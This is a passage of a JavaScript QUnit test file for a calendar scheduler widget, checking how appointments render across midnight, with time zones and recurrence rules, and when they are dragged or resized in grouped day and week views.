assert.equal($appointment.eq(1).position().top, 0, 'Appointment has a right top position'); }); QUnit.test('The part of the appointment that ends after midnight should have right height when set startDayHour & endDayHour', function(assert) { this.createInstance({ dataSource: [{ startDate: new Date(2015, 4, 25, 21), endDate: new Date(2015, 4, 26, 2), text: 'Test task' }], currentDate: new Date(2015, 4, 25), views: ['week'], currentView: 'week', startDayHour: 1, endDayHour: 23, cellDuration: 60 }); const $element = this.instance.$element(); const $appointment = $element.find('.' + APPOINTMENT_CLASS).eq(1); const cellHeight = $element.find('.' + DATE_TABLE_CELL_CLASS).eq(0).get(0).getBoundingClientRect().height; assert.equal($appointment.outerHeight(), cellHeight, 'appt part has right height'); }); QUnit.test('The parts of recurrence appointment before and after midnight should be shown on Week view', function(assert) { const scheduler = createInstance({ dataSource: [{ startDate: new Date(2015, 4, 27, 23, 0), endDate: new Date(2015, 4, 28, 1, 15), text: 'Test task', recurrenceRule: 'FREQ=DAILY;INTERVAL=2' }], currentDate: new Date(2015, 4, 27), views: ['week'], currentView: 'week', cellDuration: 60 }); const cellHeight = scheduler.workSpace.getCellHeight(); assert.equal(scheduler.appointments.getAppointmentCount(), 4, 'Appt parts are shown'); assert.equal(scheduler.appointments.getAppointmentPosition(2).top, cellHeight * 23, 'Second appointment part before midnight has a correct top position'); assert.equal(scheduler.appointments.getAppointmentPosition(3).top, 0, 'Second appointment part after midnight has a right top position'); }); QUnit.test('The part of recurrence appointment before midnight should be shown on Day view', function(assert) { const scheduler = createInstance({ dataSource: [{ startDate: new Date(2015, 4, 25, 23, 0), endDate: new Date(2015, 4, 26, 1, 15), text: 'Test task', recurrenceRule: 'FREQ=DAILY;INTERVAL=2' }], currentDate: new Date(2015, 4, 27), views: ['day'], currentView: 'day', cellDuration: 60 }); const cellHeight = scheduler.workSpace.getCellHeight(); assert.equal(scheduler.appointments.getAppointmentCount(), 1, 'Appt part is shown'); assert.equal(scheduler.appointments.getAppointmentPosition().top, cellHeight * 23, 'Appointment has a correct top position'); }); QUnit.test('The part of recurrence appointment after midnight should be shown on Day view', function(assert) { const scheduler = createInstance({ dataSource: [{ startDate: new Date(2015, 4, 25, 23, 0), endDate: new Date(2015, 4, 26, 1, 15), text: 'Test task', recurrenceRule: 'FREQ=DAILY;INTERVAL=2' }], currentDate: new Date(2015, 4, 26), views: ['day'], currentView: 'day', cellDuration: 60 }); assert.equal(scheduler.appointments.getAppointmentCount(), 1, 'Appt part is shown on 2d day'); assert.equal(scheduler.appointments.getAppointmentPosition().top, 0, 'Appointment has a correct top position'); scheduler.instance.option('currentDate', new Date(2015, 4, 28)); assert.equal(scheduler.appointments.getAppointmentCount(), 1, 'Appt part is shown on 2d day'); assert.equal(scheduler.appointments.getAppointmentPosition().top, 0, 'Appointment has a correct top position'); }); QUnit.test('The part of recurrence appointment after midnight should have right height on the first day of week', function(assert) { this.createInstance({ dataSource: [{ startDate: new Date(2015, 4, 25, 22, 0), endDate: new Date(2015, 4, 26, 3, 30), text: 'Test task', recurrenceRule: 'FREQ=DAILY;INTERVAL=2' }], currentDate: new Date(2015, 5, 1), views: ['week'], currentView: 'week', firstDayOfWeek: 1, startDayHour: 2, endDayHour: 23, cellDuration: 30 }); const $element = this.instance.$element(); const $appointment = $element.find('.' + APPOINTMENT_CLASS).eq(0); const cellHeight = $element.find('.' + DATE_TABLE_CELL_CLASS).eq(0).get(0).getBoundingClientRect().height; assert.equal($appointment.outerHeight(), cellHeight * 3, 'appt part has right height'); }); QUnit.test('Recurring appointments should be rendered correctly with a custom timezone(T385377)', function(assert) { const tzOffsetStub = sinon.stub(timeZoneUtils, 'getClientTimezoneOffset').returns(-10800000); try { this.createInstance({ dataSource: [], currentDate: new Date(2016, 4, 7), timeZone: 'Asia/Ashkhabad', height: 500, currentView: 'week', firstDayOfWeek: 1 }); this.instance.addAppointment({ startDate: new Date(2016, 4, 2), endDate: new Date(2016, 4, 2, 0, 30), recurrenceRule: 'FREQ=DAILY' }); const $element = this.instance.$element(); const $appt = this.instance.$element().find('.' + APPOINTMENT_CLASS).eq(0); const expectedLeftPosition = $element.find('.dx-scheduler-time-panel').outerWidth(); const apptPosition = $appt.position(); assert.roughEqual(apptPosition.top, 200, 2.001, 'Appts top is OK'); assert.roughEqual(apptPosition.left, expectedLeftPosition, 2.001, 'Appts left is OK'); } finally { tzOffsetStub.restore(); } }); QUnit.test('Appointments should have correctly height with a custom timezone(T387561)', function(assert) { const tzOffsetStub = sinon.stub(timeZoneUtils, 'getClientTimezoneOffset').returns(-10800000); try { this.createInstance({ dataSource: [{ text: 'Stand-up meeting', startDate: '2015-05-25T17:00:00.000Z', endDate: '2015-05-25T17:15:00.000Z', startDateTimeZone: 'Europe/Belgrade', endDateTimeZone: 'Europe/Belgrade' }, { text: 'Approve New Online Marketing Strategy', startDate: '2015-05-25T17:00:00.000Z', endDate: '2015-05-25T19:00:00.000Z' }], currentDate: new Date(2015, 4, 25), timeZone: 'America/Los_Angeles', height: 500, currentView: 'week', firstDayOfWeek: 0 }); const $element = this.instance.$element(); const $appts = this.instance.$element().find('.' + APPOINTMENT_CLASS); const cellHeight = $element.find('.' + DATE_TABLE_CELL_CLASS).eq(0).outerHeight(); assert.roughEqual($appts.eq(0).outerHeight(), cellHeight / 2, 2.001, 'Appts top is OK'); assert.roughEqual($appts.eq(1).outerHeight(), cellHeight * 4, 2.001, 'Appts top is OK'); } finally { tzOffsetStub.restore(); } }); QUnit.test('Two vertical neighbor appointments should be placed correctly', function(assert) { this.createInstance({ dataSource: [], firstDayOfWeek: 1, currentDate: new Date(2015, 1, 24), views: ['week'], currentView: 'week', width: 800 }); this.instance.addAppointment({ text: 'b', startDate: new Date(2015, 1, 23, 1), endDate: new Date(2015, 1, 23, 1, 30) }); this.instance.addAppointment({ text: 'a', startDate: new Date(2015, 1, 23, 0, 30), endDate: new Date(2015, 1, 23, 1) }); this.instance.addAppointment({ text: 'c', startDate: new Date(2015, 1, 23, 0, 30), endDate: new Date(2015, 1, 23, 1), allDay: true }); const $commonAppointments = this.instance.$element().find('.dx-scheduler-scrollable-appointments .dx-scheduler-appointment'); const $allDayAppts = this.instance.$element().find('.dx-scheduler-all-day-appointment'); const cellWidth = this.instance.$element().find('.' + DATE_TABLE_CELL_CLASS).eq(0).outerWidth(); assert.roughEqual(translator.locate($commonAppointments.eq(0)).left, 100, 2.001, 'Left position is OK'); assert.roughEqual(translator.locate($commonAppointments.eq(1)).left, 100, 2.001, 'Left position is OK'); assert.roughEqual(translator.locate($allDayAppts.eq(0)).left, 100, 2.001, 'Left position is OK'); assert.roughEqual($commonAppointments.eq(0).outerWidth(), cellWidth - APPOINTMENT_DEFAULT_LEFT_OFFSET, 1.001, 'Width is OK'); assert.roughEqual($commonAppointments.eq(1).outerWidth(), cellWidth - APPOINTMENT_DEFAULT_LEFT_OFFSET, 1.001, 'Width is OK'); assert.roughEqual($allDayAppts.eq(0).outerWidth(), cellWidth, 1.001, 'Width is OK'); }); QUnit.test('Appointment size should depend on neighbor appointments', function(assert) { const items = [{ text: 'a', startDate: new Date(2015, 2, 4, 1), endDate: new Date(2015, 2, 4, 2) }, { text: 'b', startDate: new Date(2015, 2, 4, 2, 30), endDate: new Date(2015, 2, 4, 3) }, { text: 'c', startDate: new Date(2015, 2, 4, 2, 30), endDate: new Date(2015, 2, 4, 3) }, { text: 'd', startDate: new Date(2015, 2, 4, 1, 30), endDate: new Date(2015, 2, 4, 3) }]; this.createInstance({ currentView: 'week', currentDate: new Date(2015, 2, 4), dataSource: items, maxAppointmentsPerCell: 'unlimited' }); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); assert.roughEqual($appointments.eq(0).width(), $appointments.eq(3).width(), 0.1); }); QUnit.test('Recurrence appointment should be rendered correctly when currentDate was changed: all-day', function(assert) { const appointment = { startDate: new Date(2015, 1, 4, 0), endDate: new Date(2015, 1, 4, 0, 30), text: 'long appointment', recurrenceRule: 'FREQ=DAILY', allDay: true }; this.createInstance({ currentDate: new Date(2015, 1, 4), dataSource: [appointment], views: ['day'], currentView: 'day' }); this.instance.option('currentDate', new Date(2015, 1, 5)); const $appointment = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointment.length, 1, 'Appointment is rendered'); }); QUnit.test('Recurrence appointment should be rendered correctly when currentDate was changed: day', function(assert) { const appointment = { startDate: new Date(2015, 1, 4, 0), endDate: new Date(2015, 1, 4, 1), text: 'long appointment', recurrenceRule: 'FREQ=DAILY' }; this.createInstance({ currentDate: new Date(2015, 1, 4), dataSource: [appointment], views: ['day'], currentView: 'day' }); this.instance.option('currentDate', new Date(2015, 1, 5)); const $appointment = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.roughEqual($appointment.height(), 100, 1.001, 'Appointment is rendered correctly'); }); QUnit.test('Appointments should have correct position, rtl mode, editing=false', function(assert) { const appointment = { startDate: new Date(2015, 1, 4, 0), endDate: new Date(2015, 1, 4, 1) }; this.createInstance({ rtlEnabled: true, editing: false, currentDate: new Date(2015, 1, 4), views: ['day'], currentView: 'day', firstDayOfWeek: 1, dataSource: [appointment] }); const $appointment = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS).eq(0); assert.roughEqual($appointment.position().left, APPOINTMENT_DEFAULT_LEFT_OFFSET, 2, 'Appointment left is correct on init'); }); QUnit.test('Appointments should be filtered correctly, if cellDuration is set and timetable is divided with a remainder (T854826)', function(assert) { const appointments = [{ AppointmentId: 8, text: 'Appointment', startDate: '2017-05-24T14:30:00', endDate: '2017-05-24T15:45:00' }]; const scheduler = createInstance({ currentDate: new Date(2017, 4, 23), startDayHour: 8, endDayHour: 24, cellDuration: 150, views: ['day'], currentView: 'day', firstDayOfWeek: 1, dataSource: appointments }); assert.equal(scheduler.appointments.getAppointmentCount(), 0, 'Appointments was filtered correctly'); }); QUnit.test('Appointment should have correct height, when startDayHour is decimal', function(assert) { const appointments = [{ startDate: new Date(2015, 1, 4, 5, 35).toString(), endDate: new Date(2015, 1, 4, 5, 45).toString(), text: 'abc' }]; this.createInstance({ currentDate: new Date(2015, 1, 4), cellDuration: 5, views: ['day'], currentView: 'day', firstDayOfWeek: 1, dataSource: appointments, startDayHour: 5.5 }); const $appointment = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS).eq(0); const cellHeight = this.instance.$element().find('.' + DATE_TABLE_CELL_CLASS).eq(0).get(0).getBoundingClientRect().height; assert.roughEqual($appointment.position().top, cellHeight, 2.001, 'Appointment top is correct'); assert.roughEqual($appointment.outerHeight(), 2 * cellHeight, 2.001, 'Appointment height is correct'); }); QUnit.test('dropDown appointment should not compact class on vertical view', function(assert) { this.createInstance({ currentDate: new Date(2015, 4, 25), views: [{ type: 'week', name: 'week' }], currentView: 'week' }); this.instance.option('dataSource', [ { text: '1', startDate: new Date(2015, 4, 25), endDate: new Date(2015, 4, 25, 1) }, { text: '2', startDate: new Date(2015, 4, 25), endDate: new Date(2015, 4, 25, 1) }, { text: '3', startDate: new Date(2015, 4, 25), endDate: new Date(2015, 4, 25, 1) } ]); const $dropDown = $(this.instance.$element()).find('.dx-scheduler-appointment-collector').eq(0); assert.ok($dropDown.hasClass('dx-scheduler-appointment-collector-compact'), 'class is ok'); }); QUnit.test('Appointments should be rendered correctly, Day view with intervalCount', function(assert) { const tasks = [ { text: 'One', startDate: new Date(2015, 2, 16, 7), endDate: new Date(2015, 2, 16, 7, 30) }, { text: 'Two', startDate: new Date(2015, 2, 16, 11), endDate: new Date(2015, 2, 16, 11, 30) }, { text: 'Three', startDate: new Date(2015, 2, 18, 12), endDate: new Date(2015, 2, 18, 12, 30) }, { text: 'Four', startDate: new Date(2015, 2, 18, 15), endDate: new Date(2015, 2, 18, 15, 30) } ]; const dataSource = new DataSource({ store: tasks }); this.createInstance({ currentDate: new Date(2015, 2, 16), dataSource: dataSource, views: [{ type: 'day', name: 'Day', intervalCount: 3 }], currentView: 'day' }); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 4, 'Appointments were rendered correctly'); }); QUnit.test('Appointments should be rendered correctly, Week view with intervalCount', function(assert) { const tasks = [ { text: 'One', startDate: new Date(2015, 4, 25, 7), endDate: new Date(2015, 4, 25, 7, 30) }, { text: 'Two', startDate: new Date(2015, 5, 1, 11), endDate: new Date(2015, 5, 1, 11, 30) }, { text: 'Three', startDate: new Date(2015, 5, 6, 12), endDate: new Date(2015, 5, 6, 12, 30) }, { text: 'Four', startDate: new Date(2015, 5, 12, 15), endDate: new Date(2015, 5, 12, 15, 30) } ]; const dataSource = new DataSource({ store: tasks }); this.createInstance({ currentDate: new Date(2015, 4, 25), dataSource: dataSource, views: [{ type: 'week', name: 'week', intervalCount: 3 }], currentView: 'week' }); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 4, 'Appointments were rendered correctly'); }); QUnit.test('Appointments should be rendered correctly, Day view with intervalCount and startDate', function(assert) { const tasks = [ { text: 'One', startDate: new Date(2017, 5, 25, 4), endDate: new Date(2017, 5, 25, 4, 30) }, { text: 'Two', startDate: new Date(2017, 5, 26, 0), endDate: new Date(2017, 5, 26, 0, 30) }, { text: 'Three', startDate: new Date(2017, 5, 27, 10), endDate: new Date(2017, 5, 27, 11) } ]; const dataSource = new DataSource({ store: tasks }); this.createInstance({ currentDate: new Date(2017, 5, 26), dataSource: dataSource, views: [{ type: 'day', name: 'day', intervalCount: 3, startDate: new Date(2017, 5, 25) }], currentView: 'day' }); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 3, 'Appointments were rendered correctly'); }); QUnit.test('Appointments should be rendered correctly, Week view with intervalCount and startDate', function(assert) { const tasks = [ { text: 'One', startDate: new Date(2017, 5, 22, 4), endDate: new Date(2017, 5, 22, 4, 30) }, { text: 'Two', startDate: new Date(2017, 5, 26, 0), endDate: new Date(2017, 5, 26, 0, 30) }, { text: 'Three', startDate: new Date(2017, 6, 2, 10), endDate: new Date(2017, 6, 2, 11) }, { text: 'Four', startDate: new Date(2017, 6, 9, 8), endDate: new Date(2017, 6, 9, 8, 30) } ]; const dataSource = new DataSource({ store: tasks }); this.createInstance({ currentDate: new Date(2017, 5, 26), dataSource: dataSource, views: [{ type: 'week', name: 'week', intervalCount: 3, startDate: new Date(2017, 5, 19) }], currentView: 'week', firstDayOfWeek: 1 }); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 4, 'Appointments were rendered correctly'); }); QUnit.test('Appointments should be rendered correctly after switching Day view with intervalCount and startDate', function(assert) { const tasks = [ { text: 'One', startDate: new Date(2017, 5, 28, 4), endDate: new Date(2017, 5, 28, 4, 30) }, { text: 'Two', startDate: new Date(2017, 5, 29, 0), endDate: new Date(2017, 5, 29, 0, 30) }, { text: 'Three', startDate: new Date(2017, 5, 30, 10), endDate: new Date(2017, 5, 30, 11) } ]; const dataSource = new DataSource({ store: tasks }); this.createInstance({ currentDate: new Date(2017, 5, 26), dataSource: dataSource, views: [{ type: 'day', name: 'day', intervalCount: 3, startDate: new Date(2017, 5, 25) }], currentView: 'day' }); $(this.instance.$element().find('.dx-scheduler-navigator-next')).trigger('dxclick'); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 3, 'Appointments were rendered correctly'); }); QUnit.test('Appointments should be rendered correctly after switching Week view with intervalCount and startDate', function(assert) { const tasks = [ { text: 'One', startDate: new Date(2017, 6, 10, 4), endDate: new Date(2017, 6, 10, 4, 30) }, { text: 'Two', startDate: new Date(2017, 6, 18, 0), endDate: new Date(2017, 6, 18, 0, 30) }, { text: 'Three', startDate: new Date(2017, 6, 25, 10), endDate: new Date(2017, 6, 25, 11) } ]; const dataSource = new DataSource({ store: tasks }); this.createInstance({ currentDate: new Date(2017, 5, 26), dataSource: dataSource, views: [{ type: 'week', name: 'week', intervalCount: 3, startDate: new Date(2017, 5, 19) }], currentView: 'week', firstDayOfWeek: 1 }); $(this.instance.$element().find('.dx-scheduler-navigator-next')).trigger('dxclick'); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 3, 'Appointments were rendered correctly'); }); QUnit.test('Appointment should have right width on mobile devices & desktop in week view', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 13, 1), endDate: new Date(2018, 2, 13, 3) }], currentDate: new Date(2018, 2, 13), views: ['week'], currentView: 'week' }); const $appointments = this.instance.$element().find('.' + APPOINTMENT_CLASS); const cellWidth = this.instance.$element().find('.' + DATE_TABLE_CELL_CLASS).eq(0).outerWidth(); assert.roughEqual($appointments.eq(0).outerWidth(), cellWidth - APPOINTMENT_DEFAULT_LEFT_OFFSET, 1.001, 'Width is OK'); }); QUnit.test('Appointments should be rendered correctly in vertical grouped workspace Day', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 1, 9), endDate: new Date(2018, 2, 1, 10, 30), id: 1 }, { text: 'b', startDate: new Date(2018, 2, 1, 9), endDate: new Date(2018, 2, 1, 10, 30), id: 2 }], currentDate: new Date(2018, 2, 1), views: [{ type: 'day', groupOrientation: 'vertical' }], currentView: 'day', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], startDayHour: 9, showAllDayPanel: false }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointments are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().get(0).getBoundingClientRect().height; assert.equal($appointments.eq(0).position().top, 0, 'correct top position'); assert.equal($appointments.eq(0).position().left, 200, 'correct left position'); assert.equal($appointments.eq(1).position().top, cellHeight * 30, 'correct top position'); assert.equal($appointments.eq(1).position().left, 200, 'correct left position'); }); QUnit.test('Appointments should be rendered correctly in vertical grouped workspace Week', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 16, 9), endDate: new Date(2018, 2, 16, 10, 30), id: 1 }, { text: 'b', startDate: new Date(2018, 2, 16, 9), endDate: new Date(2018, 2, 16, 10, 30), id: 2 }], currentDate: new Date(2018, 2, 16), views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], startDayHour: 9, showAllDayPanel: false }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointments is rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).eq(0).get(0).getBoundingClientRect().height; const cellWidth = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).eq(0).get(0).getBoundingClientRect().width; assert.equal($appointments.eq(0).position().top, 0, 'correct top position'); assert.equal($appointments.eq(0).position().left, 200 + cellWidth * 5, 'correct left position'); assert.equal($appointments.eq(1).position().top, cellHeight * 30, 'correct top position'); assert.equal($appointments.eq(1).position().left, 200 + cellWidth * 5, 'correct left position'); }); QUnit.test('Appointments should be rendered correctly in vertical grouped workspace Week, showAllDayPanel = true', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 2, startDate: new Date(2018, 4, 21, 9, 30), endDate: new Date(2018, 4, 21, 11, 30) }, { text: '2', id: 2, allDay: true, startDate: new Date(2018, 4, 21, 9, 30), endDate: new Date(2018, 4, 21, 11, 30) }, ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 15, cellDuration: 60, showAllDayPanel: true, width: 2000 }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointments are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); assert.roughEqual($appointments.eq(0).position().top, 7 * cellHeight, 1.5, 'correct top position of allDay appointment'); assert.roughEqual($appointments.eq(0).outerHeight(), 0.5 * cellHeight, 2, 'correct size of allDay appointment'); assert.roughEqual(translator.locate($appointments.eq(0)).left, 456, 1.1, 'correct left position of allDay appointment'); assert.roughEqual($appointments.eq(1).position().top, 8.5 * cellHeight, 1.5, 'correct top position of appointment'); assert.roughEqual($appointments.eq(1).position().left, 456, 1.1, 'correct left position of appointment'); }); QUnit.test('Rival allDay appointments from different groups should be rendered correctly in vertical grouped workspace Week', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 1, allDay: true, startDate: new Date(2018, 4, 21, 9, 30), endDate: new Date(2018, 4, 21, 11, 30) }, { text: '2', id: 2, allDay: true, startDate: new Date(2018, 4, 21, 9, 30), endDate: new Date(2018, 4, 21, 11, 30) }, ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 15, cellDuration: 60, showAllDayPanel: true }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointments are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); assert.roughEqual($appointments.eq(0).position().top, 0, 1.5, 'correct top position of allDay appointment'); assert.roughEqual($appointments.eq(0).outerHeight(), 0.5 * cellHeight, 2, 'correct size of allDay appointment'); assert.equal(translator.locate($appointments.eq(0)).left, 314, 'correct left position of allDay appointment'); assert.roughEqual($appointments.eq(1).position().top, 7 * cellHeight, 1.5, 'correct top position of allDay appointment'); assert.roughEqual($appointments.eq(1).outerHeight(), 0.5 * cellHeight, 2, 'correct size of allDay appointment'); assert.equal(translator.locate($appointments.eq(1)).left, 314, 'correct left position of allDay appointment'); }); QUnit.test('Rival allDay appointments from same groups should be rendered correctly in vertical grouped workspace Week', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 1, allDay: true, startDate: new Date(2018, 4, 21, 9, 30), endDate: new Date(2018, 4, 21, 11, 30) }, { text: '2', id: 1, allDay: true, startDate: new Date(2018, 4, 21, 9, 30), endDate: new Date(2018, 4, 21, 11, 30) }, ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 15, cellDuration: 60, showAllDayPanel: true }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); assert.roughEqual($appointments.eq(0).position().top, 0.5 * cellHeight, 2.5, 'correct top position of allDay appointment'); assert.roughEqual($appointments.eq(0).outerHeight(), 0.5 * cellHeight, 2, 'correct size of allDay appointment'); assert.equal(translator.locate($appointments.eq(0)).left, 314, 'correct left position of allDay appointment'); }); QUnit.test('Rival appointments from one group should be rendered correctly in vertical grouped workspace Week', function(assert) { this.createInstance({ dataSource: [], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], width: 800, currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 15, cellDuration: 60, showAllDayPanel: true }); this.instance.option('dataSource', [ { text: '1', id: 2, startDate: new Date(2018, 4, 21, 9, 30), endDate: new Date(2018, 4, 21, 11, 30) }, { text: '2', id: 2, startDate: new Date(2018, 4, 22, 9, 30), endDate: new Date(2018, 4, 22, 11, 30) }, ]); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 2, 'two appointments are rendered'); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); assert.roughEqual($appointments.eq(0).position().top, 8.5 * cellHeight, 1.5, 'correct top position of appointment'); assert.roughEqual($appointments.eq(0).outerWidth(), 59, 2, 'correct size of appointment'); assert.roughEqual($appointments.eq(0).position().left, 285, 1.1, 'correct left position of appointment'); assert.roughEqual($appointments.eq(1).position().top, 8.5 * cellHeight, 1.5, 'correct top position of appointment'); assert.roughEqual($appointments.eq(1).outerWidth(), 59, 2, 'correct size of appointment'); assert.roughEqual($appointments.eq(1).position().left, 370, 1.1, 'correct left position of appointment'); }); QUnit.test('Appointment in bottom cell should be rendered cirrectly in vertical grouped workspace Week', function(assert) { this.createInstance({ dataSource: [ { text: '1', id: 2, startDate: new Date(2018, 4, 22, 13, 0), endDate: new Date(2018, 4, 22, 17, 30) }, ], views: [{ type: 'week', groupOrientation: 'vertical' }], currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], currentDate: new Date(2018, 4, 21), startDayHour: 9, endDayHour: 15, width: 2000, cellDuration: 60, showAllDayPanel: true }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).first().outerHeight(); assert.roughEqual($appointments.eq(0).position().top, 12 * cellHeight, 1.5, 'correct top position of appointment'); assert.roughEqual($appointments.eq(0).outerHeight(), 100, 2, 'correct size of appointment'); }); QUnit.test('Appointment should be dragged correctly between the groups in vertical grouped workspace Day', function(assert) { this.createInstance({ _draggingMode: 'default', dataSource: [{ text: 'a', startDate: new Date(2018, 2, 1, 12), endDate: new Date(2018, 2, 1, 12, 30), id: 1 }], currentDate: new Date(2018, 2, 1), views: [{ type: 'day', groupOrientation: 'vertical' }], editing: true, currentView: 'day', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], startDayHour: 12, endDayHour: 16, showAllDayPanel: false }); this.scheduler.appointmentList[0].drag.toCell(10); this.clock.tick(); const appointmentData = dataUtils.data(this.instance.$element().find('.' + APPOINTMENT_CLASS).get(0), 'dxItemData'); assert.deepEqual(appointmentData.startDate, new Date(2018, 2, 1, 13), 'Start date is correct'); assert.deepEqual(appointmentData.endDate, new Date(2018, 2, 1, 13, 30), 'End date is correct'); assert.deepEqual(appointmentData.id, 2, 'Group is OK'); }); QUnit.test('Appointment should be dragged correctly between the groups in vertical grouped workspace Week', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 16, 12), endDate: new Date(2018, 2, 16, 12, 30), id: 1 }], currentDate: new Date(2018, 2, 16), views: [{ type: 'week', groupOrientation: 'vertical' }], editing: true, currentView: 'week', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], startDayHour: 12, endDayHour: 16, showAllDayPanel: false, _draggingMode: 'default' }); this.scheduler.appointmentList[0].drag.toCell(75); this.clock.tick(); const appointmentData = dataUtils.data(this.instance.$element().find('.' + APPOINTMENT_CLASS).get(0), 'dxItemData'); assert.deepEqual(appointmentData.startDate, new Date(2018, 2, 16, 13), 'Start date is correct'); assert.deepEqual(appointmentData.endDate, new Date(2018, 2, 16, 13, 30), 'End date is correct'); assert.deepEqual(appointmentData.id, 2, 'Group is OK'); }); QUnit.test('Hourly recurring appt should be rendred in vertical grouped workspace Day', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 16, 12, 30), endDate: new Date(2018, 2, 16, 13, 15), recurrenceRule: 'FREQ=HOURLY', id: 1 }], currentDate: new Date(2018, 2, 16), views: [{ type: 'day', groupOrientation: 'vertical' }], currentView: 'day', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], startDayHour: 12, endDayHour: 16, showAllDayPanel: false }); const $appointments = $(this.instance.$element()).find('.' + APPOINTMENT_CLASS); assert.equal($appointments.length, 4, 'Appointments are rendered'); }); QUnit.test('Appt shouldn\'t be resized to the group border in horizontal grouped workspace Day', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 16, 14), endDate: new Date(2018, 2, 16, 15), id: 1 }], currentDate: new Date(2018, 2, 16), views: [{ type: 'day', groupOrientation: 'vertical' }], currentView: 'day', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], editing: true, startDayHour: 12, endDayHour: 16, showAllDayPanel: false }); const $element = $(this.instance.$element()); const cellHeight = $(this.instance.$element()).find('.' + DATE_TABLE_CELL_CLASS).eq(0).get(0).getBoundingClientRect().height; const pointer = pointerMock($element.find('.dx-resizable-handle-bottom').eq(0)).start(); pointer.dragStart().drag(0, cellHeight * 2).dragEnd(); const $appointment = $element.find('.' + APPOINTMENT_CLASS).eq(0); assert.equal($appointment.position().top + $appointment.outerHeight(), cellHeight * 8, 'Correct bottom coordinate'); }); QUnit.test('Appt shouldn\'t be resized to the group border after scrolling in horizontal grouped workspace Day', function(assert) { this.createInstance({ dataSource: [{ text: 'a', startDate: new Date(2018, 2, 16, 14), endDate: new Date(2018, 2, 16, 15), id: 2 }], currentDate: new Date(2018, 2, 16), views: [{ type: 'day', groupOrientation: 'vertical' }], currentView: 'day', groups: ['id'], resources: [ { field: 'id', dataSource: [ { id: 1, text: 'one' }, { id: 2, text: 'two' } ] } ], editing: true, startDayHour: 12, endDayHour: 16, showAllDayPanel: true, height: 500 }); const scrollable = this.instance.getWorkSpace().getScrollable(); scrollable.scrollTo({ left: 0, top: 400 }); const 